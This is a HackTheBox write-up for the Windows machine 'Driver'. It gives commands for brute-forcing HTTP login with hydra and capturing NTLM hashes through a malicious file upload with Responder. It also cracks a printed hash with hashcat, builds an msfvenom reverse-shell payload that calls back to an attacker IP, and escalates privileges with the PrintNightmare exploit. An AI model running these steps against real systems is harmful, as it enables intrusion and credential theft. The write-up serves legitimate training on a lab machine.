Hackthebox - Driver
Windows
Nmap
Port 80
Inspecting with burp
The response header when trying to authenticate gives this (we can also see it in the nmap scan):
So we get username, we can try to bruteforce with hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.11.106 http-get
So we have admin:admin credentials
There is a file upload functionality and it says it will go in the share. It bugged me for a while and then I remember the URL File attack So I uploaded this file
I named it with and @ at the begining for instance
@csbygb
And then we need to launch responder with smb server on obviously
responder -w --lm -v -I tun0
Now we just have to crack one of them with hashcat
We just need to copy a whole one like this
tony::DRIVER:a05acd47ab1ac310:B15097FF39CD452C8F8E53BDC33B7B37:0101000000000000DF515CFA2F5DD801D1688BA244C5025400000000020000000000000000000000
And then launch hashcat as follow
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Let's see what shares we have
Let's get a shell with evil-winrm
evil-winrm -i 10.10.11.106 -u tony -p liltony
It works! Let's grab our user flag in tony's desktop!
Privesc
Let's get winpeas and execute it in our target
In our kali
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220424/winPEASx64.exe
Now we just have to upload it in our target with evilwinrm it really easy we just need to type
upload winPEASx64.exe
And we launch it
.\winPEASx64.exe
If we google the specific driver we have a privesc vuln
Let's get a shell with msfconsole so that we can privesc using a metasploit module
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe -o reverse2.exe
in our evvilwinrm shell
upload reverse.exe
I got annoyed with this exploit because I could not make it work
I decided to use printnightmare instead
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
From evil winrm
upload CVE-2021-1675.ps1
Import-Module .\CVE-2021-1675.ps1
Get-Command Invoke-Nightmare
Invoke-Nightmare -NewUser "csbygb" -NewPassword "csbygb123!"
Finally if we net user we see we are in the admin group
net user csbygb
Now we just need to use evil-winrm with our new user
evil-winrm -i 10.10.11.106 -u csbygb -p csbygb123!
And we can grab the admin flag
cd C:\Users\Administrator\Desktop
type root.txt
Last updated